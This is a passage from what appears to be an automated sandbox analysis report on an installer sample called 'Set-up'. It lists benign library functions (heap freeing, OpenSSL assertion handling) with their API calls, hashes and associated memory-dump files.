                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: nghttp3_rcbuf.c$rcbuf->ref > 0
                                • API String ID: 1222420520-1879435254
                                • Opcode ID: 99fc26709c4a3691b92dc0e93981219a19beb23cbc69d015272eaadbff422354
                                • Instruction ID: 90ccfa63626619cd84369076efd0023c5b535d1f698caf52b1d2f32520f489dc
                                • Opcode Fuzzy Hash: 99fc26709c4a3691b92dc0e93981219a19beb23cbc69d015272eaadbff422354
                                • Instruction Fuzzy Hash: D5E039382006049FCA198B15D949A66B7F1BF8D726F98C298F4098B2F2DB35DC02DA01
                                Function 002EA170 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 002E9F60: GetStdHandle.KERNEL32(000000F4), ref: 002E9F76
                                  • Part of subcall function 002E9F60: GetFileType.KERNEL32(00000000), ref: 002E9F83
                                  • Part of subcall function 002E9F60: WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 002E9FBB
                                • raise.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000016,002ED8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,002EDF70,?,?,?,?,?,?,?,00000000), ref: 002EA18B
                                • _exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000003,?,002ED8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,002EDF70,?,?,?,?,?,?,?), ref: 002EA195
                                Strings
                                • %s:%d: OpenSSL internal error: %s, xrefs: 002EA17C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: File$HandleTypeWrite_exitraise
                                • String ID: %s:%d: OpenSSL internal error: %s
                                • API String ID: 2477291680-569889646
                                • Opcode ID: 487c891abaae3408a02d6a7b446ed209454e08f007aac8d4856bef79a9c9be81
                                • Instruction ID: 09ddf3dae5b866066555ae1bf0dff4f6f6bfba1c5b44468aa1845ec4ad78ca0a
                                • Opcode Fuzzy Hash: 487c891abaae3408a02d6a7b446ed209454e08f007aac8d4856bef79a9c9be81
                                • Instruction Fuzzy Hash: 5CC022B2980341BBEF027E814C03A3AB8206F22704F081C2DB204200D39AA38234A74B
                                Function 006386C0 Relevance: 5.1, APIs: 4, Instructions: 80COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00638600: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,006386ED), ref: 00638618
                                  • Part of subcall function 00638600: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,006386ED), ref: 00638634
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00638775
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0063877D
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00638796
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006387B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: free$calloc
                                • String ID:
                                • API String ID: 3095843317-0
                                • Opcode ID: e02476b3b6dd6bf0acefb0d4685dd3d7c105711cd3208b6e3ba0905aaeca323b
                                • Instruction ID: f92ed281a20753403db8a60934c362acf18da7e67140d0bbc3bb6f23c12e0020
                                • Opcode Fuzzy Hash: e02476b3b6dd6bf0acefb0d4685dd3d7c105711cd3208b6e3ba0905aaeca323b
                                • Instruction Fuzzy Hash: 1931B4B4604B019FC710EF6AC4C059ABBF6FF99710F108A2DE99987741DB34E885CB92
                                Function 00494230 Relevance: 5.0, APIs: 4, Instructions: 44COMMON
                                Download Yara Rule
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0011F9BB,00000000,00125F07,?,?,0011F9BB,?), ref: 00494266
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0011F9BB,00000000,00125F07,?,?,0011F9BB,?), ref: 0049427A
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0011F9BB,00000000,00125F07,?,?,0011F9BB,?), ref: 00494285
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0011F9BB,00000000,00125F07,?,?,0011F9BB,?), ref: 00494290
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 05352d99cb5b6707c836cd8866524aee76852dcfb9852425cb184d5e69757df9
                                • Instruction ID: 844c15d7ce1c0754866120fc786b179d2e297cdbc5bc465457d29bed88029e23
                                • Opcode Fuzzy Hash: 05352d99cb5b6707c836cd8866524aee76852dcfb9852425cb184d5e69757df9
                                • Instruction Fuzzy Hash: 1801A276A001008FEE609B59E441D17BBD5AFD13A8F09807EE449CB362D638EC41CB85
                                Function 00482810 Relevance: 5.0, APIs: 4, Instructions: 19COMMON
                                Download Yara Rule
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0046D8A5,?), ref: 0048281B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00482826
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00482831
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0048283A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: d06baf8957ef96d7a6d475749e0039a2886766f8ae01318c45b95ee976058131
                                • Instruction ID: cd582b502a5eaf00e943b198dbed53be0662642dc3450ca8899419a2eb3fab24
                                • Opcode Fuzzy Hash: d06baf8957ef96d7a6d475749e0039a2886766f8ae01318c45b95ee976058131
                                • Instruction Fuzzy Hash: 4CD012B6C0551057FD123A15BC0244B7A905F6133CF08063EF845A1666EA16AD2595C7